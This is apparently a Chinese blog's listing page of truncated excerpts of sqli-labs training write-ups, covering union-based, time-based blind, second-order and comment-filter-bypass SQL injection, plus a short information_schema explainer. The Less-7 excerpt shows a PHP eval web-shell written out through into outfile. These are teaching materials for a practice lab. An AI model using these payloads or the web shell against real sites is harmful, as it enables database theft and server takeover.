weixin_43745072的博客

这关以来其实我就蒙了，界面过于复杂，后台php文件都有好几个。阅读源码发现，所有地方都对输入进行了过滤。mysql_real_escape_string就是将特殊字符进行转移的函数。除了一个地方->pass_change.php中，usermae是通过$_SESSION获取的，而$_SESSION中的参数是通过login.php中的参数设置的，这里根据代码分析，是传入的用户名。注入，并在后台可以看到注入的真是语句为下图。admin '#在admin '#登录.

Less-23 注释符过滤首先，在尝试'发现可以注入，但是在尝试注入之后一直报错。并且无论是#还是--+，回显都没有出现，初步判断是注释符过滤了。查看源码可以看到，#和--+都被替换为了空字符。所以这次要考虑闭合掉引号，构造查询语句。//filter the comments out so as to comments should not work$reg = "/#/";$reg1 = "/--/";$replace = "";$id = preg_replace($reg, $

Less-18对于这个关卡来说，后端代码对于name以及password都有过滤。那么我们在这里的注入就是不可行的。function check_input($value) { if(!empty($value)) { // truncation (see comments) $value = substr($value,0,20); } // Stripslashes if magic quotes enabled if (get_magic_quotes_gpc()

information_schemainformation_schema这这个数据库中保存了MySQL服务器所有数据库的信息。如数据库名，数据库的表，表栏的数据类型与访问权限等。再简单点，这台MySQL服务器上，到底有哪些数据库、各个数据库有哪些表，每张表的字段类型是什么，各个数据库要什么权限才能访问，等等信息都保存在information_schema里面。information_schema的表schemata中的列schema_name记录了所有数据库的名字information_sc.

转载请注明出处Less-9Less-9是一个盲注的，因为无论注入正确与否，返回的信息都是相同的。那么参考下Less-9的题目，我们可以看到，考虑基于时间的盲注。其原理主要是使用if函数，对字符串特定位置判断，为真就不操作，反之sleep(5)首先查询表名。这里通过改变substr中下一个字符的值"`1"，以及对应的字符的值125。如果if判断的条件为真，那么就是字符匹配，就沉睡5s反之直接执行下一个字符匹配。1' union select 1,If(ascii(substr(databa

Less-7首先，这一关的要求是使用文件进行攻击判断注入情况，此时两个情况输出是不同的，所以可以断定，这个时候存在注入点。?id=1')) and 1=1# ?id=1')) and 1=2# 看提示，本关要求的是使用文件注入，也就是我们要在网站创建后门进行攻击。可以考虑into outfile写入文件中攻击载荷，注意：$_POST要大写'<?php @eval($_POST["mima"])?>' into outfile "F:\\phpStudy\\WWW\\

less 1寻找溢出点，判断注入类型输入为1，显示正常?id=1输入为1’，显示异常，并且输入为2-1，显示的是id=2的内容，初步判断是字符型注入。同时从报错的到数据库为mysql。?id=1'注释引号，可以正常显示?id=1'#判断有多少列，3不报错，4报错?id=-1' order by 3 #?id=-1' order by 4 #判断显示位，可以知道显示位是第2,3位?id=-1' union select 1,2,3 #我们使